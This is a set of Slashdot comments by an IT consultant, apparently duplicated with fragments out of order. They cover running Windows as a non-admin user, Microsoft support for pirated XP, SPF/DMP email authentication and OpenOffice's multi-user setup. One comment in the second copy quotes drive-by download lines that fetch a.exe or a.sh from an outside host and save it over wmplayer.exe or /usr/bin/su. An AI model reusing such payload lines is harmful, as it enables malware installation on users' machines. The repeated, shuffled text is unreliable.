All I did was change where Q2 stored its saved games, downloads and configs. The result not only works just fine as a non-admin, but supports different settings for each user.
Game developers, in fact all developers, have no excuses.
The core security problem with Windows is that Microsoft has been unable or unwilling to take advantage of the core security capabilities of Windows.
That started to change after Office 2000. That kits rus fine as a non-administrator on Win2K and later. It's all of the other developers I have to convince.
*yawn* not again. Caught more than two years before the fact. By Outlook itself (yes, as in Outlook 98, Outlook 2000, 2002, 2003, Outlook Express 6 SP1). No?
Hands up all you sysadmins who aren't keeping your users' mail programs up to date. OK, Users: Avoid these people like the plague and hire yourselves some real consultants.
"assigning blame isn't going to accomplish a lot."
No shoes, no shirt, no service.
Microsoft doesn't exactly provide an essential service. They're not a telephone company or energy utility. They have the right to refuse service. It doesn't make good PR, but it makes good business sense - you shouldn't have to service anyone for free.
That they bother to service their paying customers five to ten years after the fact is pretty impressive.
The presence of compromised machines, even if they are not your own, result in increased network traffic, resulting in a slower overall connection if you don't happen to have a dedicated bandwidth connection. Further, the compromised machines can be used by spammers to harrass pretty much everyone, even if they use non Windows OS's.
You didn't mention reckless drivers, but I'll introduce them as an example. We hold reckless drivers responsible because it's taken decades of horrible deaths to do that. You're right - no one's died from a computer virus, though careers and business are impacted. But currently, society doesn't hold other members of society responsible for their reckless computing.
When that day comes, we'll see ISPs actually act on complaints, we'll see fines, criminal charges, summary convictions / misdemeanors for reckless computing, and then it will have less of an impact. Until then, it's still the Wild West and it's every user for themselves.
For me, reckless idiots running pirated, unpatched XP boxes don't negatively affect me, my business, my life or my career. I make a few one-time changes and a few one-time purchases to adapt. Now the joker who stole my bike seat yesterday? He impacted me more in one morning than all of the reckless computer users on the Internet combined this year, so far.
If website designers designed with "trusted sites" in mind, and had all the graphic servers, SSL and credit card payment servers, etc named under a single domain, a user could just put their domain in "trusted sites" or whatever the equivelant in Mozilla is, turn off all the fluffy stuff for "everyone else," and surf comparably pop-up-free.
Most ads are served up on different domains, Take Slashdot for example, here. I have slashdot.org in Trusted Sites but the banners still run in the so-called Internet zone, where their scripting doesn't bother me.
1) Buy a legal copy of XP and actually pay for the support you deserve. You can get cut rates from mose vendors IF you buy some hardware (for example, new hard drive, or new RAM stick) with it.
2) Use one of the multitude of product key changers available (I'm not telling) like what happened when SP1 came out.
3) Use Windows 2000 instead - everything designed for XP so far works fine on Win2K Service Pack 4, though you will need IE6 among other free add-ons to get some functionality included in XP. If you're cheap, go talk to the guy you got XP from.
4) If you really insist on using a non-service-packed XP, then go buy some third-party security (hardware firewall, anti-virus software) like you used to do with your pirated copy of Win98.
Take responsibility for your own computer security, already, or pay someone to do it for you. Stop whining about how Microsoft is deliberately and maliciosly denying you support you don't deserve because you didn't pay for it. Or do the legwork and get Linux and learn how to use it.
As for Microsoft being "irresponsible," sorry. Users have to choose to be irresponsible. You don't have to use that pirated copy of XP.
Yes Ms Client, we're safe from it. Yes ma'am, I know we haven't patched your machines. Yes ma'am, that's why we spent the $350 on that Snapgear box. No ma'am, we don't need to update our anti-virus software just yet. No ma'am, I took McAfee off because it wasn't stopping them fast enough. And it caused the machines to freeze anyway. Yes ma'am, we're saving $69.00/year/machine now. No ma'am, we dont need to update Outlook, it's catching them just fine by itself. No ma'am, I won't charge you for this service call - I didn't have to do anything. Yes ma'am, please recommend my firm to your colleages.
I remember Snapgear Routers being called "The Poor Man's Cisco" with all of the capabilities their included Linux distribution had. With modifications to this router, this could become "The Poor Man's Snapgear."
A Snapgear LITE2, without wireless, is about C$350. This thing, for US$80 or so, plus an hour's work, could do all the work of a Snapgear plus have wireless routing.
Are there similar hacks for non-wireless Linksys products? I wanted to get Snapgears for a new installation but this would be even better!
Since forwarding's coming up a lot in here I have to say how NOT to break forwarding.
First, think of Accountability instead of Trust. Trusting someone remains with the recipient. Holding the sender accountable for their mail by making sure such mail actually came from them, is an easier solution, and is enough of a solution given that spammers don't want to be held accountable.
So, why not hold the forwarder acocuntable if they want to forward mail, rather than the original sender?
DMP does this by allowing the receiver to verify a forwarder instead of or in addition to the original sender. See chapter 5 of http://www.pan-am.ca/dmp/draft-fecyk-dmp-02.tx t
SEOUL - CRUCIAL TALKS here this week on Meng Weng Wong's SPF ambitions made modest progress but failed to bridge the divide on major issues concerning the 11-month tension.
Wrapping up their two hour negotiations Thursday, Wong, Danisch, Fecyk, Brand, Hardie and Fältström adopted a chairman's statement in which they agreed to set up a working group for detailed discussions and hold the next talks in August, at San Diego...
Seems to me that OOo still wants me to perform an eleven-step process to satisfy a basic usability requirement for applications on current versions of Microsoft Windows.
You have to do a "network install" [...]Then, each (non-admin) user runs the user install from that directory so that personal settings are set up.
Um, MS Office 2000 and later automatically do this when a new user starts a MS Office app for the first time. And I don't have to perform any special setup magic. Why doesn't OO do this?
I'm not prepared to explain this extra manual step to a bunch of end users who are supposed to be getting an "easier" version of Windows to deal with. "Multi-user" and "network" are two different things. And how about multi-user on a standard *ix box? Isn't it already mutli-user on *ix? Why not just look for differently named environment variables as ponted out?
My staff recommended including it in an XP distribution kit I'm puting together for a new promotion. I declined only because OO didn't work in XP as a limited user, and that it didn't support multiple users' settings.
I realize OO's built from a common source code base that should work for multiple platforms, and such proprietary things as The Registry would be verbotten territory. That doesn't forgive the designers, though, who have access to per-user environment variables, per-user home directories and common areas to store information as defined in Windows 2000 and Windows XP.
Of note:
%userprofile% is the equivelant to $home. Store per-user settings here, or in %appdata% which is hidden normally (like.whatever files), but still set per-user. %allusersprofile% and %ProgramFiles% point to common areas that are at least read-only to all users.
Minor programming changes to look for these environment variables would let OO be multi-user and secure on current and supported versions of Win32. How hard is that?
> There are lots of things in windows that > require admin access, MS office 97 requires it
KB 257643 and others like it cover Office 97 under Win2K and XP as restricted users - edits to security take care of those. Those are bugs in Office 97 apps, plain and simple. But then again, Office 97 isn't supported anymore.
Sure, one Office 2000 applet (Photo Editor) requires a similar hack. It only needs doing once, and then Sysprep and Ghost are your friends in the enterprise.
> AutoCAD does as well
And Autodesk doesn't have a fix by this time? Like I explained: How long has it been? Four years at least? No Excuse. Autodesk has competitors.
Someone asked me to make AutoCAD (whatever version it was) work as a restricted user. I charge C$30.00/hour for this work - take me up on it as you likely won't find cheaper. And if you want, I'll publish your paid work here.
or some variant of that. If it blocks that, then it's probably breaking some functionality that other users want.
Speaking of breaking functionality in the name of security, here's a question: Why did Sun DOWNGRADE the Java 1.1 security standards from Java 1.0? Could it be because too many coders asked for it? If you can't do that code snip in Mozilla now, how long before some one else demands it?
From another Vmyths rant:
Guess what? Java or Linux or whatever comes next will create even more homogeneity at the session, presentation, and application layers. "Sure, Rob, but we'll sacrifice flexibility & functionality for safety when VaporOS v1.0 debuts." Ah, of course. Will VaporOS v1.1 downgrade its security specs like Java v1.1 did?
> If you've going to have to replace most of > your application software and half your > peripherals to run as a regular user, > wouldn't it be easier to just replace your > operating system?
People won't switch from what they've grown accustomed to. It's actually easier to replace hardware once, and certain applications once, than to replace an OS, notably across a whole enterprise. And it's actually easier to replace Win95/Win98 with Win2K than is it to replace it with XP, never mind any Linux distro or BSD.
> Because then you'd keep Microsoft apologists > like him out of work.
He hit the nail on the head there.:-) Only instead of patching Microsoft OSes I'd be patching Linux OSes and closing different IP ports. Same garbage, different OS.
Sure, this keeps me in contracts. If people were really scared of Windows they'd all switch to OpenBSD. But they won't. They'll just secure their Windows desktops like the pros do.
And I don't need M$ bugs to keep me employed - there are plenty of idiots out there writing viruses to keep me in work for years to come.
Also known as: Was this fixed long before the fact? Does IE 5.5 contain this same vulnerability?
Sticking with Win2K for a moment, IE5.5 is part of SP4. Office 2K SR-1 or later needs IE5.5. Who is still running IE5(not.5 or any of.5's service packs) that would be vulnerable to this, and are the folks who run 5.5(sp1/sp2?) for some reason still vulnerable?
I once posted here how McAfee's software broke my Win2K installation my messing up a bunch of file types and prompting "Preparing to Install..." every time I tried launching IE. Haven't touched or recommended McAfee's software ever since.
While Norton AV works as a regular user, it obviously can't get to stuff restricted from the regular user.
Aside from that I admit I can't tell you how Norton behaves as a regular user, because clients those networks I've locked down actually don't need AV software on the desktop! A Snapgear firewall catches worms before the fact, Outlook 2K catches executable attachments before the fact, and denying Execute permissions in %temp% and Documents and Settings stops viruses in zip files before the fact. And even if something gets past all that, what harm can the virus do running as a regular user? Take up CPU time until the user logs off?
Heh, the virus would probably crash to Dr Watson because it wasn't designed to run as a regular user. heh heh heh heh
> My experience with WindowsUpdate is that some > of my paranoid settings are reset after each > patch.
Fair question. I've not known of a patch or Service Pack that reset NTFS permissions on existing files, except for the IIS Lockdown Tool which is doing what it was designed to do.
I know Win2K SP3 and SP4 insist on re-enabling Automatic Updates.
Also, I tend to do a lot of things before the fact that avoid needing to patch every day or even every month. Such as using a good firewall (Hey I use Linux 2.4! On Snapgear equipment!) and using e-mail software that refuses to open executable attachments. Period. Enforced by a system or group policy.
Of course users can't install patches without Admin privilege, so no worries about a patch getting in under my nose.
CD burners: Roxio EasyCD Creator 5 and later work as regular users.
Scanners: I know HP doesn't support some older scanners under Win2K. Later HP ones, especially USB based ones, work fine as a regular user. The combo printer/scanners I've seen work fine as a regular user.
Programs that require Admin: That's why we have competition. I've massaged some badly behaving apps into working as a regular user - it's not hard to loosen up the minimums an app "needs". It's even easier to go to their competition (Quickbooks vs Simply Accounting: One works as a regular user, one requires "power user." Which one did I recommend?)
As for the plain "zipped-idiot.exe" e-mail? That's what Outlook 2000 and later are for: "Outlook has blocked access to the following attachments: this-is-a-bomb.exe/scr/bat/com/etc"
> Tell you what sparky -- YOU try that across > a enterprise type installation.
Done. Twice.
I'm an IT consultant, a professional. I practice what I preach and I test things. I bounce applications that don't work with MY security standards. And I'm paid well for it.
I've massaged very broken applications into a secured environment. I'm talking about really broken, designed-for-16-bit-windows applications. I've never worked with recent versions of AutoCAD but, after at least ten years of developing for 32-bit Windows, and with Win2K being four years old, Autodesk has no excuse.
Slashdot Mirror
All I did was change where Q2 stored its saved games, downloads and configs. The result not only works just fine as a non-admin, but supports different settings for each user.
Game developers, in fact all developers, have no excuses.
That started to change after Office 2000. That kits rus fine as a non-administrator on Win2K and later. It's all of the other developers I have to convince.
*yawn* not again. Caught more than two years before the fact. By Outlook itself (yes, as in Outlook 98, Outlook 2000, 2002, 2003, Outlook Express 6 SP1). No?
Hands up all you sysadmins who aren't keeping your users' mail programs up to date. OK, Users: Avoid these people like the plague and hire yourselves some real consultants.
Not that it stopped hordes of travellers anyway.
Maybe people will choose to take charge of their own computer security like I've ranted about for years now.
Back when Messenger Service popups happened and started using $80 hardware firewalls that doubled as Internet sharing boxes.
When Blaster hit I was sitting pretty and so was every client that took my advice.
*yawn*
"assigning blame isn't going to accomplish a lot."
No shoes, no shirt, no service.
Microsoft doesn't exactly provide an essential service. They're not a telephone company or energy utility. They have the right to refuse service. It doesn't make good PR, but it makes good business sense - you shouldn't have to service anyone for free.
That they bother to service their paying customers five to ten years after the fact is pretty impressive.
You didn't mention reckless drivers, but I'll introduce them as an example. We hold reckless drivers responsible because it's taken decades of horrible deaths to do that. You're right - no one's died from a computer virus, though careers and business are impacted. But currently, society doesn't hold other members of society responsible for their reckless computing.
When that day comes, we'll see ISPs actually act on complaints, we'll see fines, criminal charges, summary convictions / misdemeanors for reckless computing, and then it will have less of an impact. Until then, it's still the Wild West and it's every user for themselves.
For me, reckless idiots running pirated, unpatched XP boxes don't negatively affect me, my business, my life or my career. I make a few one-time changes and a few one-time purchases to adapt. Now the joker who stole my bike seat yesterday? He impacted me more in one morning than all of the reckless computer users on the Internet combined this year, so far.
If website designers designed with "trusted sites" in mind, and had all the graphic servers, SSL and credit card payment servers, etc named under a single domain, a user could just put their domain in "trusted sites" or whatever the equivelant in Mozilla is, turn off all the fluffy stuff for "everyone else," and surf comparably pop-up-free.
Most ads are served up on different domains, Take Slashdot for example, here. I have slashdot.org in Trusted Sites but the banners still run in the so-called Internet zone, where their scripting doesn't bother me.
1) Buy a legal copy of XP and actually pay for the support you deserve. You can get cut rates from mose vendors IF you buy some hardware (for example, new hard drive, or new RAM stick) with it.
2) Use one of the multitude of product key changers available (I'm not telling) like what happened when SP1 came out.
3) Use Windows 2000 instead - everything designed for XP so far works fine on Win2K Service Pack 4, though you will need IE6 among other free add-ons to get some functionality included in XP. If you're cheap, go talk to the guy you got XP from.
4) If you really insist on using a non-service-packed XP, then go buy some third-party security (hardware firewall, anti-virus software) like you used to do with your pirated copy of Win98.
Take responsibility for your own computer security, already, or pay someone to do it for you. Stop whining about how Microsoft is deliberately and maliciosly denying you support you don't deserve because you didn't pay for it. Or do the legwork and get Linux and learn how to use it.
As for Microsoft being "irresponsible," sorry. Users have to choose to be irresponsible. You don't have to use that pirated copy of XP.
Yes Ms Client, we're safe from it.
Yes ma'am, I know we haven't patched your machines.
Yes ma'am, that's why we spent the $350 on that Snapgear box.
No ma'am, we don't need to update our anti-virus software just yet.
No ma'am, I took McAfee off because it wasn't stopping them fast enough. And it caused the machines to freeze anyway.
Yes ma'am, we're saving $69.00/year/machine now.
No ma'am, we dont need to update Outlook, it's catching them just fine by itself.
No ma'am, I won't charge you for this service call - I didn't have to do anything.
Yes ma'am, please recommend my firm to your colleages.
I remember Snapgear Routers being called "The Poor Man's Cisco" with all of the capabilities their included Linux distribution had. With modifications to this router, this could become "The Poor Man's Snapgear."
A Snapgear LITE2, without wireless, is about C$350. This thing, for US$80 or so, plus an hour's work, could do all the work of a Snapgear plus have wireless routing.
Are there similar hacks for non-wireless Linksys products? I wanted to get Snapgears for a new installation but this would be even better!
Good design, lots of testing and before-the-fact protection. Just make sure the Anti-Virus Cartel doesn't get involved.
Since forwarding's coming up a lot in here I have to say how NOT to break forwarding.
x t
First, think of Accountability instead of Trust. Trusting someone remains with the recipient. Holding the sender accountable for their mail by making sure such mail actually came from them, is an easier solution, and is enough of a solution given that spammers don't want to be held accountable.
So, why not hold the forwarder acocuntable if they want to forward mail, rather than the original sender?
DMP does this by allowing the receiver to verify a forwarder instead of or in addition to the original sender. See chapter 5 of
http://www.pan-am.ca/dmp/draft-fecyk-dmp-02.t
SEOUL - CRUCIAL TALKS here this week on Meng Weng Wong's SPF ambitions made modest progress but failed to bridge the divide on major issues concerning the 11-month tension.
Wrapping up their two hour negotiations Thursday, Wong, Danisch, Fecyk, Brand, Hardie and Fältström adopted a chairman's statement in which they agreed to set up a working group for detailed discussions and hold the next talks in August, at San Diego...
Seems to me that OOo still wants me to perform an eleven-step process to satisfy a basic usability requirement for applications on current versions of Microsoft Windows.
You have to do a "network install" [...]Then, each (non-admin) user runs the user install from that directory so that personal settings are set up.
Um, MS Office 2000 and later automatically do this when a new user starts a MS Office app for the first time. And I don't have to perform any special setup magic. Why doesn't OO do this?
I'm not prepared to explain this extra manual step to a bunch of end users who are supposed to be getting an "easier" version of Windows to deal with. "Multi-user" and "network" are two different things. And how about multi-user on a standard *ix box? Isn't it already mutli-user on *ix? Why not just look for differently named environment variables as ponted out?
My staff recommended including it in an XP distribution kit I'm puting together for a new promotion. I declined only because OO didn't work in XP as a limited user, and that it didn't support multiple users' settings.
.whatever files), but still set per-user.
I realize OO's built from a common source code base that should work for multiple platforms, and such proprietary things as The Registry would be verbotten territory. That doesn't forgive the designers, though, who have access to per-user environment variables, per-user home directories and common areas to store information as defined in Windows 2000 and Windows XP.
Of note:
%userprofile% is the equivelant to $home. Store per-user settings here, or in %appdata% which is hidden normally (like
%allusersprofile% and %ProgramFiles% point to common areas that are at least read-only to all users.
Minor programming changes to look for these environment variables would let OO be multi-user and secure on current and supported versions of Win32. How hard is that?
> There are lots of things in windows that
> require admin access, MS office 97 requires it
KB 257643 and others like it cover Office 97 under Win2K and XP as restricted users - edits to security take care of those. Those are bugs in Office 97 apps, plain and simple. But then again, Office 97 isn't supported anymore.
Sure, one Office 2000 applet (Photo Editor) requires a similar hack. It only needs doing once, and then Sysprep and Ghost are your friends in the enterprise.
> AutoCAD does as well
And Autodesk doesn't have a fix by this time? Like I explained: How long has it been? Four years at least? No Excuse. Autodesk has competitors.
Someone asked me to make AutoCAD (whatever version it was) work as a restricted user. I charge C$30.00/hour for this work - take me up on it as you likely won't find cheaper. And if you want, I'll publish your paid work here.
> x.Open("GET", "http://adversting.co.uk/a.exe",0);
> s.SaveToFile( "C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
Go ahead and tell me Mozilla doesn't do this:
> x.Open("GET", "http://adversting.co.uk/a.sh",0);
> s.SaveToFile( "/usr/bin/su",2);
or some variant of that. If it blocks that, then it's probably breaking some functionality that other users want.
Speaking of breaking functionality in the name of security, here's a question: Why did Sun DOWNGRADE the Java 1.1 security standards from Java 1.0? Could it be because too many coders asked for it? If you can't do that code snip in Mozilla now, how long before some one else demands it?
From another Vmyths rant:
Guess what? Java or Linux or whatever comes next will create even more homogeneity at the session, presentation, and application layers. "Sure, Rob, but we'll sacrifice flexibility & functionality for safety when VaporOS v1.0 debuts." Ah, of course. Will VaporOS v1.1 downgrade its security specs like Java v1.1 did?
> If you've going to have to replace most of
:-) Only instead of patching Microsoft OSes I'd be patching Linux OSes and closing different IP ports. Same garbage, different OS.
> your application software and half your
> peripherals to run as a regular user,
> wouldn't it be easier to just replace your
> operating system?
People won't switch from what they've grown accustomed to. It's actually easier to replace hardware once, and certain applications once, than to replace an OS, notably across a whole enterprise. And it's actually easier to replace Win95/Win98 with Win2K than is it to replace it with XP, never mind any Linux distro or BSD.
> Because then you'd keep Microsoft apologists
> like him out of work.
He hit the nail on the head there.
Sure, this keeps me in contracts. If people were really scared of Windows they'd all switch to OpenBSD. But they won't. They'll just secure their Windows desktops like the pros do.
And I don't need M$ bugs to keep me employed - there are plenty of idiots out there writing viruses to keep me in work for years to come.
Also known as: Was this fixed long before the fact? Does IE 5.5 contain this same vulnerability?
.5 or any of .5's service packs) that would be vulnerable to this, and are the folks who run 5.5(sp1/sp2?) for some reason still vulnerable?
Sticking with Win2K for a moment, IE5.5 is part of SP4. Office 2K SR-1 or later needs IE5.5. Who is still running IE5(not
I once posted here how McAfee's software broke my Win2K installation my messing up a bunch of file types and prompting "Preparing to Install..." every time I tried launching IE. Haven't touched or recommended McAfee's software ever since.
While Norton AV works as a regular user, it obviously can't get to stuff restricted from the regular user.
Aside from that I admit I can't tell you how Norton behaves as a regular user, because clients those networks I've locked down actually don't need AV software on the desktop! A Snapgear firewall catches worms before the fact, Outlook 2K catches executable attachments before the fact, and denying Execute permissions in %temp% and Documents and Settings stops viruses in zip files before the fact. And even if something gets past all that, what harm can the virus do running as a regular user? Take up CPU time until the user logs off?
Heh, the virus would probably crash to Dr Watson because it wasn't designed to run as a regular user. heh heh heh heh
> My experience with WindowsUpdate is that some
> of my paranoid settings are reset after each
> patch.
Fair question. I've not known of a patch or Service Pack that reset NTFS permissions on existing files, except for the IIS Lockdown Tool which is doing what it was designed to do.
I know Win2K SP3 and SP4 insist on re-enabling Automatic Updates.
Also, I tend to do a lot of things before the fact that avoid needing to patch every day or even every month. Such as using a good firewall (Hey I use Linux 2.4! On Snapgear equipment!) and using e-mail software that refuses to open executable attachments. Period. Enforced by a system or group policy.
Of course users can't install patches without Admin privilege, so no worries about a patch getting in under my nose.
CD burners: Roxio EasyCD Creator 5 and later work as regular users.
Scanners: I know HP doesn't support some older scanners under Win2K. Later HP ones, especially USB based ones, work fine as a regular user. The combo printer/scanners I've seen work fine as a regular user.
Programs that require Admin: That's why we have competition. I've massaged some badly behaving apps into working as a regular user - it's not hard to loosen up the minimums an app "needs". It's even easier to go to their competition (Quickbooks vs Simply Accounting: One works as a regular user, one requires "power user." Which one did I recommend?)
As for the plain "zipped-idiot.exe" e-mail? That's what Outlook 2000 and later are for: "Outlook has blocked access to the following attachments: this-is-a-bomb.exe/scr/bat/com/etc"
> Tell you what sparky -- YOU try that across
> a enterprise type installation.
Done. Twice.
I'm an IT consultant, a professional. I practice what I preach and I test things. I bounce applications that don't work with MY security standards. And I'm paid well for it.
I've massaged very broken applications into a secured environment. I'm talking about really broken, designed-for-16-bit-windows applications. I've never worked with recent versions of AutoCAD but, after at least ten years of developing for 32-bit Windows, and with Win2K being four years old, Autodesk has no excuse.